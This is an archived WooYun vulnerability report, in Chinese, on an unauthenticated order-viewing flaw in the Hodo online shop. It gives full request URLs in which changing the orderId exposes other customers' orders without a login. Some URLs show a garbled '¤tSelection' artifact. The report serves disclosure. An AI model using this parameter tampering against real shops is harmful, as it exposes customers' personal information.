乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-02-10: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-05-11: 厂商已经主动忽略漏洞,细节向公众公开
用户订购商品后,点击查看订单,相关连接的URL中嵌入了没经验证的另一段URL,该URL展示了用户的信息,导致漏洞产生。
在红豆商城注册一账号玩,随意选一商品,填单,确认订单后查看订单信息,其URL如下:
https://www.hodo.cn/webapp/wcs/stores/servlet/AjaxLogonForm?catalogId=10001&langId=-7&storeId=10151&krypto=JeuX%2BVEXYJDb5ICN8N5ebOfDqYAM9VLjrCb%2BL42et5s%3D&ddkey=http:AjaxLogonForm#https%3A%2F%2Fwww.hodo.cn%2Fmall%2FAjaxHistoryOrdersView%3FbreadCrumb%3DBrcmb%26currentSelection%3DOrderDetailSlct%26objectIdParam%3DorderId%26catalogId%3D10001%26langId%3D-7%26orderId%3D3720529%26storeId%3D10151%26orderStatusCode%3D%26identifier%3D1392122503362
看着眼花,遂转码。
https://www.hodo.cn/webapp/wcs/stores/servlet/AjaxLogonForm?catalogId=10001&langId=-7&storeId=10151&krypto=JeuX+VEXYJDb5ICN8N5ebOfDqYAM9VLjrCb+L42et5s=&ddkey=http:AjaxLogonForm#https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb¤tSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720529&storeId=10151&orderStatusCode=&identifier=1392122503362
可以看到,其中嵌入了一个地址:
https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb¤tSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720529&storeId=10151&orderStatusCode=&identifier=1392122503362
单独打开这一地址,可以看到订单的信息:
于是如果帐号未登录是否可查看订单信息呢?换其他浏览器打开,果然,是可以直接看到的。果断更改参数,看看可有惊喜,发现更改上一段URL中的orderId参数值即可查看不同用户的信息。orderId = 3720528(
https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb¤tSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720528&storeId=10151&orderStatusCode=&identifier=1392122503361
)的情形:
orderId = 3720518(
https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb¤tSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720518&storeId=10151&orderStatusCode=&identifier=1392122503361
的情形:
orderId = 3720528(
加验证。。。
未能联系到厂商或者厂商积极拒绝